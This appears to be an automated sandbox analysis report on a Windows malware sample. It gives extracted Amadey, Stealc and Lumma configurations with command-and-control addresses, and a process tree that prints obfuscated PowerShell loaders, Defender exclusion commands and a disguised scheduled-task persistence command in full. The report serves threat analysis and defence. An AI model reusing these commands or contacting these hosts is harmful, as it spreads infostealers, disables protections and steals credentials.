Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 01:32

General

  • Target

    5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe

  • Size

    1.8MB

  • MD5

    9ee9fc91594ff0d745d83ae3ede6c725

  • SHA1

    27ca7f96db3ed74658fc89ca6d33db35c59d8a77

  • SHA256

    5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7

  • SHA512

    bf7d5e625fbe7adb3d1bbdc60d9263a8bb3cc000f6053033ae1ea786f7a657e5012f0f0946835b18622313e6b0f298b0e1e7aa29329f89a9f45ad440220fccef

  • SSDEEP

    49152:lkk2FX4poT387IR/vpA82dUSZ3nVZdUuHKSMuj:qk7ow7IRpd2djlV8Amu

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
      PID:796
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:908
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:960
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:428
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1036
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
              1⤵
                PID:1060
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1072
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1172
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3320
                      • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                        C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:2204
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        2⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4888
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1212
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1364
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1388
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1396
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1416
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1560
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1576
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2968
                                          • C:\Windows\SysWOW64\svchost.exe
                                            "C:\Windows\System32\svchost.exe"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3056
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1584
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1624
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1748
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1756
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1856
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1880
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1944
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1952
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1996
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                          1⤵
                                                            PID:2088
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2136
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2180
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2284
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2360
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2368
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                        PID:2416
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2464
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2484
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2600
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:3012
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2432
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3264
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3436
                                                                                      • C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe"
                                                                                        2⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks computer location settings
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Drops file in Windows directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3556
                                                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                          3⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4912
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3652
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2052
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:5004
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4056
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2236
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')
                                                                                                6⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2612
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3660
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
                                                                                                6⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:816
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
                                                                                                  7⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3156
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
                                                                                                    8⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3004
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    8⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4056
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                      9⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1896
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                                                                                                      9⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5632
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')
                                                                                                      9⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5304
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                      9⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2688
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\10002870122\UpdatedAdmin.cmd" "
                                                                                                      9⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5448
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\10002870122\UpdatedAdmin.cmd';$nPrC='LoGoteadGote'.Replace('Gote', ''),'FITAkrITAkomBITAkaITAksITAke6ITAk4SITAktrITAkingITAk'.Replace('ITAk', ''),'EwCHintwCHirwCHiywCHiPwCHioiwCHintwCHi'.Replace('wCHi', ''),'SpePUtlitePUt'.Replace('ePUt', ''),'DecYisdompYisdrYisdeYisdsYisdsYisd'.Replace('Yisd', ''),'TsNkHrasNkHnssNkHfosNkHrsNkHmFsNkHinsNkHalsNkHBlosNkHcsNkHksNkH'.Replace('sNkH', ''),'CrfXbxeatfXbxeDfXbxecrfXbxypfXbxtfXbxorfXbx'.Replace('fXbx', ''),'MMLdxaMLdxinMLdxMoMLdxduMLdxleMLdx'.Replace('MLdx', ''),'ElIeKReIeKRmIeKReIeKRnIeKRtAIeKRtIeKR'.Replace('IeKR', ''),'InHUKcvHUKcokHUKceHUKc'.Replace('HUKc', ''),'ReazMwFdLzMwFizMwFneszMwF'.Replace('zMwF', ''),'ChaJonanaJongeEaJonxtaJonenaJonsaJoniaJonoaJonnaJon'.Replace('aJon', ''),'GepcketpckeCpckeurpckerepckentPpckerocpckeepckesspcke'.Replace('pcke', ''),'CQogZopQogZyTQogZoQogZ'.Replace('QogZ', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($nPrC[12])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kMdJS($RQSTg){$zmvMN=[System.Security.Cryptography.Aes]::Create();$zmvMN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zmvMN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zmvMN.Key=[System.Convert]::($nPrC[1])('ML5/q9cXAh8zwmdF4WccY8ENAkFEsjrEy+dUpWTmk7k=');$zmvMN.IV=[System.Convert]::($nPrC[1])('zFU4xrxhUym0St+7yBu7eA==');$pWysh=$zmvMN.($nPrC[6])();$OefOm=$pWysh.($nPrC[5])($RQSTg,0,$RQSTg.Length);$pWysh.Dispose();$zmvMN.Dispose();$OefOm;}function PFVVL($RQSTg){$eAKke=New-Object System.IO.MemoryStream(,$RQSTg);$LAgIa=New-Object System.IO.MemoryStream;$nDRnz=New-Object System.IO.Compression.GZipStream($eAKke,[IO.Compression.CompressionMode]::($nPrC[4]));$nDRnz.($nPrC[13])($LAgIa);$nDRnz.Dispose();$eAKke.Dispose();$LAgIa.Dispose();$LAgIa.ToArray();}$LXMkx=[System.IO.File]::($nPrC[10])([Console]::Title);$NXZhU=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 5).Substring(2))));$MPjpB=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 6).Substring(2))));[System.Reflection.Assembly]::($nPrC[0])([byte[]]$MPjpB).($nPrC[2]).($nPrC[9])($null,$null);[System.Reflection.Assembly]::($nPrC[0])([byte[]]$NXZhU).($nPrC[2]).($nPrC[9])($null,$null); "
                                                                                                        10⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5180
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        10⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2636
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                          11⤵
